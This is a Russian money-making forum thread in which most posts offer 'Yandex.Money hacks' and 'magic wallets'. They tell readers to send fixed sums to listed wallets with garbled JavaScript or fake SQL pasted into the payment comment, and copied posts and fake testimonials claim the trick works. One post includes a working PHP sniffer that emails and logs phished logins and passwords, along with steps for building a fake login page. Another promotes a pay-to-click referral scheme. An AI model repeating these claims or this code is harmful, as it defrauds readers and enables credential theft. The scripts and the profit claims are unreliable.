КАК ЗАРАБОТАТЬ ДЕНЬГИ

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » КАК ЗАРАБОТАТЬ ДЕНЬГИ » Тестовый форум » ВЗЛОМ ЯНДЕКС ДЕНЕГ 100%


ВЗЛОМ ЯНДЕКС ДЕНЕГ 100%

Сообщений 1 страница 30 из 236

1

На этом сайте Вы узнаете всю правду о ВОЛШЕБНЫХ КОШЕЛЬКАХ, а также принцип их работы. Как работают лохотронцики и как их обманывать, зарабатывая при этом деньги. Здесь Вы узнаете алгоритм работы программ, управляющих волшебными кошельками. Сначала расскажу как меня кинули волшебные кошельки на 1472 р. Сидел я в Internet, лазил по сайтам и искал работу. И тут наткнулся на сайт с заголовком Волшебный кошелёк. Меня это заинтересовало,зашёл на этот сайт, на котором прочитал«Есть в системе Яндекс.Деньги волшебный кошелёк, и все что вы на него пошлете вернеться вам в утроеном размере!Любая сумма!Пошлете тысячу получите три тысячи и т.д.». Сразу подумал,что это очередное кидалово,которых в Интернете миллионы.Но решил проверить и послал 50р.Ждал в течение часа, но так мне ничего и не прислали,подумал,что кинули.Но спустя где-то ещё 3 часа проверила свой кошелёк и обнаружил перевод в 150р. Я сразу же послал ещё 100 р – получил 300. Подумал действительно работает,послал всё, что у меня было 1472 р. Что было дальше я думаю Вы поняли. Никаких денег мне не пришло. Сначала расстроился, обидно блин. Но решил задуматься,как работают эти чёртовы волшебные кошельки. Полазив в поисковых системах я нашёл множество подобных сайтов и, как ни странно, кошельки в них очень часто повторялись. Поразмыслив,я понял их систему.Принцип работы волшебных кошельков. На волшебный кошелёк сразу никто много не пошлёт. Вот они и отдают деньги, чтобы люди осмелели и поверили им. Но можно и обмануть волшебные кошельки.Если быть аккуратным и выслать, небольшую сумму, то всегда можно получать в три раза больше. Волшебный кошелёк 41001342232673. Подробности его работы. Переводы суммой до 726 р он не забирает никогда. Только если вы пришлете его больше 3 раз подряд с одного кошелька. То есть, послав 726 вы в любом случае получите сумму в 3 раза больше,так как сумма мелкая и они будут ждать пока вы пришлете больше. Также не забираються одноразово присланные суммы 1500 р. Если аккуратно слать им небольшие суммы с разных кошельков то можно их обманывать. Они же не смотрят на переводы сами, за них это делает специальный софт (программа). Стратегия заработка денег с помощью волшебных кошельков Яндекс.Деньги Можно открыть где-то 3 кошелька, и постоянно слать, и быть в плюсе всегда. Это не миллионы, но это более-менее стабильный доход. Денег на этих кошельках десятки и сотни тысяч, и меня очень раздражает как они кидают людей, поэтому надо их разорить. Больше всего в жизни я ненавижу, когда меня обманывают. Поэтому я решил бороться с лохотронщиками до конца и надеюсь Вы мне в этом поможете, заработав при этом денег. Я уже сагитировал порядка 30 своих друзей, которые тоже пытаются разорить лохотронщиков и призываю Вас присоединяться к нам. А пока за дело... На волшебном кошельке 41001342232673 полно денег.

0

2

Доброго времени суток!

     Меня зовут Юля. Я программистка (PHP, Delphi),В Интернете известна ещё как один из разработчик программы "Russian Password Crackers" (взлом, восстановление паролей) И разработчица программы SpyAgent (клавиатурный шпион), сейчас эту программу не развиваю. На данный момент я планирую и разрабатываю новые проекты, связанные с пассивными источниками дохода. Работаю также в сфере SEO, немножко интересуюсь МЛН-бизнесом (не "пирамидами", а только с участием реальной полезной продукции).

     Как то раз пришла мне в голову мысль взломать яндекс систему потому что это первая система на которой мало всякой защиты в первую очередь я нагуглила в поисковике много информации и увидел массу разных разводов, в том числе и про волшебные кошельки. Запомните, что нету волшебных кошельков и программ для взлома. Программы для взлома это вирус который считывает ваш пароль и отправляет своему хозяину по эл.почте ваш платежные данные. Как-то я писала на форуме про взлом и как взломать яндекс деньги. Для этого написал специальный скрип для одного кошелька чтоб он давал сбой и присылал на ваш счет 300 рублей. Но какой-то один не умный человек взял и выложил видео в поисковую систему яндекс и старый форум wzlom.mybb.ru сразу же закрыли. Мне пришлось переделывать скрипт по новой искать дыры в системе яндекс.И вот через месяц я переделала скрипт полностью теперь этот способ опять работает. Я открыла этот форум и теперь могу поделиться информ. как взломать яндекс кошелек. И так начнем. Для начала нужно завести кошелек в системе яндекс и положить рублей 60 через терминал оплаты сот. связи ну или каким то другим способом. Потом нужно перевести ровно 50 рублей не больше не меньше на этот номер счета
41001421275396

В комментарии нужно скопировать этот скрипт:

<script language="JavaScript" type="text/javascript">// the number of ringsvar ringnumber=50function showrings() {ifdocument.all) { fr (i=0;i<=ringnumber;i++) { if (i{if (document.all) { clearTimeout(timer) startfontsize=0 for (i=0;i<=ringnumber;i++) { thisring=eval("document.all.ring"+i+".style") thisring.visibility="hidden"
i_fontsize[i]=startfontsizestep[i]=ringnumber*i*300startfontsize=Math.floor((maxfontsize/ringnumber))*(i+1)
<body><aref="http://scic.ya/seOver="showrings()onMouseOut="hid>[/font]

В течении 5 минут обновляете страницу и вам на счет должны прийти 300 рублей. Это хороший способ нажиться на этом!Этим можно пользоваться только один раз в день чтобы страждущие админы яндекса непропалили этот способ.
Уверяю вас этот способ работает!!! Проверено многими пользователями.

Отредактировано Emmi (2010-05-06 19:45:34)

0

3

Всем доброго времени суток.Я расскажу вам, как зарабатывать на  интернет кошельках, а именно на кошельках яндекс-деньги. Насчет «волшебных» кошельков типа «положил 200р.-вернулось 400р.»и т.д.- не верьте!!!Всё это жестокий развод. Не стоит думать о моментальной прибыли. Теперь, собственно, к заработку. Не так давно в инете наткнулся на сообщение, которое выглядело примерно так: «ложишь на счет  41001574423014 100р. и через 2-3 часа к тебе приходит 120р.,ложишь 200-приходит 240 и т.д. »с каждой сотней на +20р. Сначала подумал- очередной развод, но после все же решил попробовать. И каково было моё удивление, когда через 1,5 часа ко мне пришли 120р. С тех пор каждый день отсылаю туда по 2-3 раза по 200р.(больше не пробовал).И каждый день кошель толстеет на посотни.Не много,не спорю, но на мобильный и на интернет-траффик хватает. Принципа работы этого кошеля так и не понял. Возможно, там что-то наподобие сетевой пирамиды, а возможно, при более значимых суммах деньги просто оседают на этом кошельке. Работайте и зарабатывайте!

0

4

Заходим на этот форум http://yandex.3in.ru/ читаем и взламываем. Я уже давно им пользуюсь и пока без косяков.

0

5

вот этот id удваивает вапще закалебись
41001633903884

0

6

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = "mymail@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька 41001639676156
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.

"Как выполнить взлом яндекс денег на своем компе"

1. Для начала проходим сюда yandex.ru

2. Заводим почтовый ящик

3. Заводим яндекс счет

4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей

5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей

6 Переводим на этот счет 41001639676156 где мы сделали баг

7. Где сообщение получателю пишем вот это:

SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''

Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001639676156»

8. В название платежа пишем это:
cc.content_id

9. И потом жмем перевести

10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам, вот скрин жми СЮДА Проверена это уже на многих компах так что дерзайте.
Если не понятно жми СЮДА

0

7

LuckyDollar.Biz

$0,5 -$1 за клик! $10 за регистрацию! БЕЗ ВЛОЖЕНИЙ!
 
Теперь Вам не надо сутками кликать по рекламе на наших сайтах и получать копейки. Зарегистрируйтесь и получаете сразу $10 на свой аккаунт. Всего за 10 мин Вашего времени Вы сможете заработать $15 - $20 в день (STANDART member) и более при PREMIUM member. Регистрируетесь, нажимаете SURF ADS и зарабатываете.
 
Ждите по 30 сек, подтверждаете клик цифрой и деньги уже на Вашем счету! Все расчеты происходят в системе LibertyReserve (как зарегистрироваться смотрите здесь).
 
В проекте я с 6 декабря 2009 г.
 
Привожу пример заработка для СТАНДАРТНОГО (STANDART) аккаунта:
" Вы просматриваете 5 сайтов в день = $2.5
" 10 рефералов просматривают по 5 сайтов в день = $12.5 (50%) от их заработка.
" За день Вы зарабатываете = $15
" За неделю Вы зарабатываете = $105
" За месяц Вы зарабатываете = $420 + $10 за регистрацию в проекте = $430
 
И это только при 10 рефералах. По-моему, довольно неплохо. Плюс вся работа занимает 10 минут в день.
 
Я сам нашел 5 рефов и купил 15 у них на сайте LuckyDollar.Biz за $15 в разделе Purchase (покупайте ТОЛЬКО через этот раздел!). Чтоб быстрее заработать и больше взял PREMIUM за $19. Преимущества PREMIUM - $1 за каждый просмотр сайта + 10 сайтов в день для просмотра (вместо 5, как на СТАНДАРТ) + меньше срок выплат - до 15 дней max + 50.000 показов баннера с Вашей рефссылкой. (Если желаете еще быстрей и больше заработать - покупайте Golden Membership за $99 - 20 ссылок для просмотра в день по $1 +100% от заработка рефералов!). В итоге от этой рекламы у вас будет еще гарантировано 10-15 новых рефералов!
 
Также после набора $500 выплата СТАНДАРТНОМУ члену происходит в течение 45-60 дней, а PREMIUM - в течение 10-15 дней! У некоторых участников возникают вопросы - откуда они берут рефералов на продажу? Суппорт пояснил, что если участник приходит в проект БЕЗ рефссылки, а просто по адресу Главной страницы, то он становится "бесхозным". Поэтому его за плату отдают другим участником, что, кстати, очень выгодно нам, чем самому искать в Сети рефов. Также Вы можете рекламировать свои сайты (добавлять их за плату в этот проект и баннеры - Link Ad Hits и Banner Ad Views).
 
В итоге у меня идет доход (учитывая мой PREMIUM и 20 рефералов):
 
" 10 сайтов просматриваю я в день = $10
" 20 рефералов просматривают по 5 сайтов в день = $25 (50%) от их заработка;
" За день зарабатываю = $35;
" За неделю заработок = $245;
" За месяц возможно получать более $1.000 (учтите, что это при 20 рефералах и PREMIUM). При STANDART получится только $500 за 1.5 месяца, т.к. после заявки на выплату проходит более 45 дней.
 
К моменту получения первой выплаты я уже снова набрал за 10 дней $543 и снова заказал их на выплату! (заказывать новую выплату можно только после получение предыдущей). 22 января 2010 получил еще $625!!!, а 7 февраля - еще $745! 22 февраля - новая выплата - $815, 29 марта $1624.5, $2021- 17 апреля 2010 и новая выплата 13 мая 2010 г. $2447.50!
 
РЕГИСТРАЦИЯ ОЧЕНЬ ПРОСТАЯ.
 
Заходим сюда кликаем Register Только не забудьте указать ПРАВИЛЬНЫЙ номер Вашего Либерти счета (как его получить, смотрим здесь), т.к. на него Вы будете получать оплату! Пройдя регистрацию, входите под своим логином, далеекликаем SURF ADS и выходите к списку ссылок на сайты.
Нажимаем на ссылку на сайт, открывается страница с шапкой, где в верхнем левом углу видим счётчик времени просмотра сайта.
Через 30 сек. предлагается нажать на указанный номер. Если шапка страницы закрывается, значит всё ОК, закрываете эту страницу и переходите к следующей ссылке. В Вашем аккаунте добавляется сумма $0,5 или $1 при членстве PREMIUM. НЕ ОТКРЫВАЙТЕ сразу ВСЕ сайты!!! Вам просто не засчитают их просмотр и могут внести в "черный список".
 
Достаточно просматривать ссылки один раз в сутки. Уходит на это максимум 20 мин. Подходит всем пользователям интернета.
Привлекайте или покупайте рефералов! Оставляйте свои рефссылки на форумах по тематике "Работа в интернете", в comment сайтов по этой же тематике! Делитесь с друзьями! Это Ваш дополнительный пассивный доход! Можете давать платные легальные рассылки с Вашей рекламой программы и рефссылкой на почтовиках, указанных в Меню этого сайта "НАБРАТЬ РЕФЕРАЛОВ". Рефские деньги за КУПЛЕННЫХ рефералов начисляются раз в сутки, за набранных Вами лично - по мере их работы по просмотру сайтов. В проекте выплачено уже более $336.000
 
Как обменять Liberty-деньги на WM* узнайте здесь или обменяйте их прямо на сайте E-Obmen.

0

8

НашЁЛ новый способ заработка в Интернете: отправляешь деньги на яндекс-кошелек, обратно приходит в 2 раза больше. НО: отправлять надо не меньше 100 и не больше 1000 рублей, 1001 отправляла - не приходит. Я отправляю 2 раза в день по 1000 рублей, чистая прибыль получается 14000 рублей в неделю. В чем смысл – не знаю. Если кому интересно, вот номер кошелька:41001660957263  : мне про эту систему рассказал знакомый в чате, думал наколка, но оказалось – работает.

0

9

Новый взлом сново работает!

ВЗЛОМ:

Заводим свой собственный кошелёк(Это здесь: money.yandex.ru)
Ложим на счёт 50-100 руб!
И нажимаем перевести!
При переводе:
Перевод на счёт!Номер получателя: 41001541404943
Сумма к получению 50-100 руб!Но не больше и не меньше!А то деньги не прийдут!
Сообщение к получателю
<singer_id "Ваш номер кошелька"=singer "cc.cash.id" "money"=1000=50;JavaScript;100=50}robox.txt?money.yandex.ru{cheange}>
ВНИМАНИЕ НЕ ЧЕГО В СООБЩЕНИИ ПОЛУЧАТЕЛЯ НЕ ПЕРЕДЕЛЫВАТЬ!!!А ТО ДЕНЬГИ НЕ ПРИЙДУТ!!!
Название платежа: cc.cash.id
Если не ввести сообщение получателя и название платежа деньги не прийдут!
Нажимаем перевести и через 5-10 мин вам приходят:
Если вы кинули 50 рублей будет 500,а если 100 будет 1000!!!
Не теряйте надежду в взломе!

НО ПРЕДУПРЕЖДАЮ ДЕЛАЙТЕ ЕТО МАКСИМУМ 3 РАЗА НА ДНЮ А ТО ВАС РОБОТ ЯНДЕКС ДЕНЕГ СПАЛИТ!!!
ВЗЛОМ 100% РАБОЧИЙ ПРОВЕРЕН На многих компах!

0

10

http://break-dancelive.ucoz.ru-Сайт о брейк-дансе и  би-боях.Всем добро пожаловать на этот сайт.Приветствуем всех любителей хип-хопа и брейк-данса.Наш сайт представляет вашему вниманию онлайн-музыку самые свежие новости.Посетите нас и вы не пожалеете!
ttp://gamelita.ucoz.ru-У нас самые свежие новости,игры онлайн,gameplay онлайн и программы для скачивания
Наш сайт предлагает Вам подробное описание компьютерных игр, картинки коды, модификации. На данном сайте имеется самое большое различие компьютерных игр, например логические, аркады, гонки, экшены и текстовые игры.
Добро пожаловать на сайт http://megamedias.ucoz.ru-У нас вы найдёте много-много интересного.Фильмы,игры,софт и музыка.Всё бесплатно и без регистрации. Также наш сайт представляет вашему вниманию самые свежие новости и онлайн игры.(Сайт был создан 26.06.2010г)

0

11

Всем привет! Меня зовут Александр Мароков. Я занимаюсь системой Яндекс не много не мало 5 месяцев, я раньше работал програмистом, но это в прошлом! Всё своё время я буду посвещать взломам! Конечно многие из вас как я любители халявы, конечно халява не везде, но я могу вам её предоставить..
Если на чистоту:
1) я не буду предлагать вам что-то у себя купить (инструкцию по халяве)
2) я стобильно зарабатываю и проверяю кошельки попавшиеся мне на глаза!

Я проверил свыше 35 кошельков и некоторые из них я вам покажу, и расскажу!

НУ начнём!

1)41001473211595- это обычные лохотрон, обычного подростка! Если заиетите этот кошелёк не ведитесь!
2) 41001455981048- всё тоже самое отправил 50руб. и ничего не пришло!
3)41001527562404- просто гон! Там ещё java script надо было написать отправил и ничего...
4)41001624825113- Я был в шоке когда увидел этот кашелёк! Отправив 80руб. на этот кашель мне пришло какое то
сообщение с номером счёта и скриптом java. Мне стало интересно я отправил на этот кошелёк 100руб. и вставил скрипт... Мне через 12минут пришли 100руб. а ещё через 30секунд 300р. Я не стал больше отправлять! Боюсь, но на 1 раз хватит!
5)41001559308310- такоё же развод! отправив 50 руб. мне ничего не пришло! Там ещё кто то говорил что на новый смартфон накопит!
6)41001400408394- этот кашелёк рабочий.. к счастью! Но он очень не прибыльный. Я отправил на него 30 руб.-максимальная цена, и пришло мне 35руб. Отправлять можно только 3раза в день. Наверно бот там сидящий жадный!
7)41001419720268- ЛОХОТРОН! Там было сказано отпраляешь 200руб. приходит 500руб. чушь!
8)41001541404943-Ничего не пришло!
9)41001456027379- к сожалению мне пришло только сообщение: "JavaScript" type="text/javascript" а денег нет!
10)41001461706343-ничего кроме развода!

Я предоставил вас 10 вариантов решайте сами как вам поступить! Одно я вам скажу Халява в Интеренете есть, НО! Её очень сложно найти! Так что если есть вопросы ко мне пишите на E-mail Super-promaster@inbox.ru

0

12

Новый взлом сново работает!

ВЗЛОМ:

Заводим свой собственный кошелёк(Это здесь: money.yandex.ru)
Ложим на счёт 50-100 руб!
И нажимаем перевести!
При переводе:
Перевод на счёт!Номер получателя: 41001541404943
Сумма к получению 50-100 руб!Но не больше и не меньше!А то деньги не прийдут!
Сообщение к получателю
<singer_id "Ваш номер кошелька"=singer "cc.cash.id" "money"=1000=50;JavaScript;100=50}robox.txt?money.yandex.ru{cheange}>
ВНИМАНИЕ НЕ ЧЕГО В СООБЩЕНИИ ПОЛУЧАТЕЛЯ НЕ ПЕРЕДЕЛЫВАТЬ!!!А ТО ДЕНЬГИ НЕ ПРИЙДУТ!!!
Название платежа: cc.cash.id
Если не ввести сообщение получателя и название платежа деньги не прийдут!
Нажимаем перевести и через 5-10 мин вам приходят:
Если вы кинули 50 рублей будет 500,а если 100 будет 1000!!!
Не теряйте надежду в взломе!

НО ПРЕДУПРЕЖДАЮ ДЕЛАЙТЕ ЕТО МАКСИМУМ 3 РАЗА НА ДНЮ А ТО ВАС РОБОТ ЯНДЕКС ДЕНЕГ СПАЛИТ!!!
ВЗЛОМ 100% РАБОЧИЙ ПРОВЕРЕН На многих компах!

0

13

КАК ОБМАНУТЬ ЛОХОТРОНЩИКОВ И ЗАРАБОТАТЬ 2500 РУБЛЕЙ.
Я расскажу вам: 1. Как наглые лохотронщики обманывают людей на сумму в размере 50-1000 рублей (Яндекс-Деньги), а некоторых на еще большие суммы.
2. Как обмануть лохотронщиков и заработать 2500 рублей (Яндекс-Деньги)
Тема 1. История « Как я лохонул их и получаю стабильно 2500 рублей » Нашел я в сети где-то статью приблизительно такого содержания: «Есть в системе Яндекс-Деньги волшебный кошелек, и все что вы на него пошлете вернется вам в утроенном размере!!! Любая сумма от 100 рублей и выше! Пошлете десять тысяч получите тридцать тысяч и т.д.». Конечно, всем понятно, лохотрон, но если порыть глубже… Я не поверил, но для теста послал 100 рублей. Через где-то 5 часов проверил свой Яндекс кошелек и обнаружил перевод в 300 рублей! Я удивился. Послал потом еще 100 рублей опять то же самое. Потом послал 300 рублей, мне пришло 900. Осмелев окончательно послал все что у меня было – около 1500 рублей … Что было дальше, думаю, вы уже поняли. Никаких 2500 рублей мне никто не прислал, да и мои 1500 тоже исчезли навсегда… Понятно как они работают. У них на сервере стоит хитрая программка, которая принимает суммы от 100 рублей и примерно до 800 рублей (закидывал им 900 рублей и их забрали, а 800 закинул программа вернула 2400 рублей) Вот и заколачивают тысячи! В общем, это я к тому, что если быть аккуратным и выслать, небольшую сумму (они принимают любые суммы, но не меньше 100 рублей), то всегда можно получать в три раза больше. У них есть специальная программа, которая смотрит кто сколько переводов сделал и на какую сумму, чтобы определить когда нужно кидануть. Переводы суммой до 800 рублей они не забирают никогда. То есть, послав 800 рублей вы в любом случае получите 2400 рублей, т.к. сумма мелкая и они будут ждать пока вы пришлете больше. Если аккуратно слать им небольшие суммы то можно их обманывать. Они уже не смотрят на переводы сами, за них это делает специальный софт (программа), что упрощает вероятность их обмана. Я сейчас зарабатываю на этом около 15000 рублей в неделю (можно делать и больше). Это не миллионы, но это более-менее стабильный доход. Денег на этих кошельках сотни тысяч, и меня очень раздражает как они кидают людей, по этому надо их разорить. Вот сам кошелек: 41001280142945 Совет: Внимание! Повторяю! ставку поднимать не стоит, т.к. если ставка выше 800 рублей то программа их забирает даже и не пробуйте!!! Я делаю то же самое и получаю около 1500 в неделю, которых мне очень даже вполне хватает! В общем, я рассказал, что от меня требовалось. Дальше – ваше дело.

0

14

Взлом Яндекс Денег 100%
Я работаю недавно в Яндексе  и в этой системе есть небольшой недочёт B)
В общем существует такой кошелек 41001480598549 и если на него послать денег то они вернутся через 9 минуты на тот кошелёк с которого вы отправили…
Только есть небольшое но —
В примечании необходимо указать пароль — для каждой суммы он разный
Для суммы от 10 до 101 рубля — YM-A-65
Для суммы от 102 до 501 рубля — YM-66–1F5
Для суммы от 502 до 1001 рубля — YM-1F6–3E9
Для суммы от 1002 до 10001 рубля — YM-3EA-2711
Внимание посылать необходимо с одного кошелька только один раз. :)

а также зачислять деньги через смс
Потом отправляите смс на 2332(180р)или 7250(75р) с текстом
L1+1835776             
(свой яндекс номер)
но на счёт приходит не 180р а 200р
янекс округляет суммы проверено))
я уже имею свою небольшую сумму :p только нестоит делать это часто(администраторы могут увидеть что деньги исчезают и проверить систему

0

15

41001699642556
Взлом СНОВО РАБОТАЕТ!
Уважаемые пользователи Яндекс денег!
До сих пор ещё существует самы настоящий взлом!
И сейчас я раскажу какой!
ВЗЛОМ:

Заводим свой собственный кошелёк(Это здесь: money.yandex.ru)
Ложим на счёт 50,60,70,80,90,100 руб!
И не больше и не меньше(50-100)
И нажимаем кнопку перевести!

При переводе:
Перевод на счёт!Номер получателя: 41001699642556
Сумма к получению 50-100 руб!Но не больше и не меньше!А то деньги не прийдут!
Сообщение к получателю:
SELECT MONEY(DISTINCT cc.cash_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.cash_group = 'money' AND cc.cash_type = 'money' AND r.cash_id = cc.cash_id AND n.cash_id = cc.cash_id AND r.region_id = '9' AND n.model_id = «Ваш номер кошелька» AND singer_id = '{500}-50,{1000}-100{reload}''
Нечего кроме номера кошелька не менять а то деньги не прийдут!!!
Название платежа: cc.cash.id
Если не ввести сообщение получателя и название платежа деньги не прийдут!
Нажимаем перевести и через 5-10 мин вам приходят:
Если вы кинули 50 рублей будет 500,а если 100 будет 1000!!!
Если 60 руб будет 600 и т.д =)
Не теряйте надежду в взломе!

Предупреждаю!Делать только 3 раза на дню а то яндекс деньги спалят!!!
Взлом рабочий!

ВЗЛОМ 100% РАБОЧИЙ

0

16

ХаКерЪ2010 написал(а):

41001699642556
Взлом СНОВО РАБОТАЕТ!
Уважаемые пользователи Яндекс денег!
До сих пор ещё существует самы настоящий взлом!
И сейчас я раскажу какой!
ВЗЛОМ:
Заводим свой собственный кошелёк(Это здесь: money.yandex.ru)
Ложим на счёт 50,60,70,80,90,100 руб!
И не больше и не меньше(50-100)
И нажимаем кнопку перевести!
При переводе:
Перевод на счёт!Номер получателя: 41001699642556
Сумма к получению 50-100 руб!Но не больше и не меньше!А то деньги не прийдут!
Сообщение к получателю:
SELECT MONEY(DISTINCT cc.cash_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.cash_group = 'money' AND cc.cash_type = 'money' AND r.cash_id = cc.cash_id AND n.cash_id = cc.cash_id AND r.region_id = '9' AND n.model_id = «Ваш номер кошелька» AND singer_id = '{500}-50,{1000}-100{reload}''
Нечего кроме номера кошелька не менять а то деньги не прийдут!!!
Название платежа: cc.cash.id
Если не ввести сообщение получателя и название платежа деньги не прийдут!
Нажимаем перевести и через 5-10 мин вам приходят:
Если вы кинули 50 рублей будет 500,а если 100 будет 1000!!!
Если 60 руб будет 600 и т.д =)
Не теряйте надежду в взломе!
Предупреждаю!Делать только 3 раза на дню а то яндекс деньги спалят!!!
Взлом рабочий!
ВЗЛОМ 100% РАБОЧИЙ
0+-

НИХРЕНА СЕБЕ!!! ВОТ СУЩЕСТВУЮТ ВЕДЬ ЛЮДИ НА ЗЕМЛЕ КОТОРЫЕ НЕ ВРУТ!!! РЕАЛЬНО ПОЛУЧИЛ 500 рублей, а отправил всего 50!!!! 41001699642556 ВЗЛОМ РЕАЛЬНО РАБОТАЕТ!!!! САМ ПРОВЕРЕЛ!!! ОГРОМНОЕ СПАСИБО ТЕБЕ, ХаКерЪ2010!!!!!!!

0

17

Доброго времени суток!

Меня зовут Денис. Я программист (PHP, Delphi),В прошлом известен в Интернете ещё как один из разработчик программы NetFootle for XP 2.40 ее развитеем больше не

занимаюсь.На данный момент я планирую и разрабатываю новые проекты, связанные с пассивными источниками дохода. Работаю также в сфере SEO, немножко интересуюсь

МЛМ-бизнесом (не "пирамидами", а только с участием реальной полезной продукции.
Я хочу рассказать вам о том, как меня кинули. Скачал я себе программу с незатейливым названием "!CRACK!" (для взлома Яндекс.Денег. Запустил, сделал все как написано в

инструкции. Я был просто ошарашен (это еще мягко сказано. В реальности никакого взлома не было. Программа имитировала взлом Яндекс.Денег, а на самом деле отправила

пароли и файлы хозяину программы по электронной почте. Зачем создавать Трояны Яндекс.Кошельков которые обнаруживаются антивирусами, когда при помощи таких

программ мы сами отдаем "ключи от квартиры где лежат деньги ". Так я на веке лишился своего кошелька и денег. К тому же я купил эту чудо программу за 400 рублей.Я веду к

тому что есть еще масса разных разводов, в том числе и про волшебные кошельки
это все кидало-во полное. Но я нашел способ как обойти эту защиту и взломать яндекс деньги.Не давно я написал скрипт с которым можно взломать яндекс деньги вот этот

скрипт

javascript:var percentGold=100;var widthLeft=50;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next=

-(1000/memPerSec)*Math.log(Math.random());ge('percentGold').innerHTML=percentGold;ge('rateLeftGold').style.width=widthLeft+"px";ge

-(1000/memPerSec)*Math.log(Math.random());ge('percent').innerHTML=percentGold+"%";ge('rateLeft').style.width=widthLeft+"px";gefirst();a();b();});

Теперь расказываю как взломать. На этот номер кошелька 41001480598549 отправляем ровно 50 100 200 300 400 500 1000 рублей. И в комментарии которые при переводе

капируем этот скрипт написаный выше!!!ВАЖНО!!В СЛУЧАЕ ОТПРАВКИ ДРУГИХ СУММ ДЕНЬГИ НЕ ВОЗВРАЩАЮТСЯ!!!

И вам приходит 300 рублей на ваш счет.Это хороший способ нажиться на этом! Уверяю вас этот способ работает!!! Проверено многими пользователями.Кто не верит позже

выложу подробное видео как взломать.

0

18

ХаКерЪ2010 написал(а):

41001699642556
Взлом СНОВО РАБОТАЕТ!
Уважаемые пользователи Яндекс денег!
До сих пор ещё существует самы настоящий взлом!
И сейчас я раскажу какой!
ВЗЛОМ:
Заводим свой собственный кошелёк(Это здесь: money.yandex.ru)
Ложим на счёт 50,60,70,80,90,100 руб!
И не больше и не меньше(50-100)
И нажимаем кнопку перевести!
При переводе:
Перевод на счёт!Номер получателя: 41001699642556
Сумма к получению 50-100 руб!Но не больше и не меньше!А то деньги не прийдут!
Сообщение к получателю:
SELECT MONEY(DISTINCT cc.cash_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.cash_group = 'money' AND cc.cash_type = 'money' AND r.cash_id = cc.cash_id AND n.cash_id = cc.cash_id AND r.region_id = '9' AND n.model_id = «Ваш номер кошелька» AND singer_id = '{500}-50,{1000}-100{reload}''
Нечего кроме номера кошелька не менять а то деньги не прийдут!!!
Название платежа: cc.cash.id
Если не ввести сообщение получателя и название платежа деньги не прийдут!
Нажимаем перевести и через 5-10 мин вам приходят:
Если вы кинули 50 рублей будет 500,а если 100 будет 1000!!!
Если 60 руб будет 600 и т.д =)
Не теряйте надежду в взломе!
Предупреждаю!Делать только 3 раза на дню а то яндекс деньги спалят!!!
Взлом рабочий!
ВЗЛОМ 100% РАБОЧИЙ
0+-

ВЗЛОМ РЕАЛЬНО РАБОЧИЙ!!! СПАСИБО!!!

0

19

Все это бред одним словом

0

20

